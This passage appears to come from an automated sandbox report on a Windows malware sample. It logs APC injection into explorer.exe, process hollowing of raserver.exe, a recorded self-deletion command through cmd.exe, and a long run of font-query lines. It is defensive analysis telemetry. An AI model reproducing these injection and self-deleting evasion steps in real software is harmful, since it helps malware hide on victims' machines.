            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Thread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: CB0000
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Process created: C:\Users\user\Desktop\hvEop8Y70Y.exe C:\Users\user\Desktop\hvEop8Y70Y.exe
            Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\hvEop8Y70Y.exe'
            Source: explorer.exe, 00000005.00000002.507455374.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000E.00000002.508484727.0000000002ED0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000005.00000002.507455374.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000E.00000002.508484727.0000000002ED0000.00000002.00000001.sdmp Binary or memory string: Progman
            Source: explorer.exe, 00000005.00000002.507455374.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000E.00000002.508484727.0000000002ED0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
            Source: explorer.exe, 00000005.00000002.505672604.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
            Source: explorer.exe, 00000005.00000002.507455374.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000E.00000002.508484727.0000000002ED0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
            Source: explorer.exe, 00000005.00000002.507455374.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000E.00000002.508484727.0000000002ED0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Queries volume information: C:\Users\user\Desktop\hvEop8Y70Y.exe VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
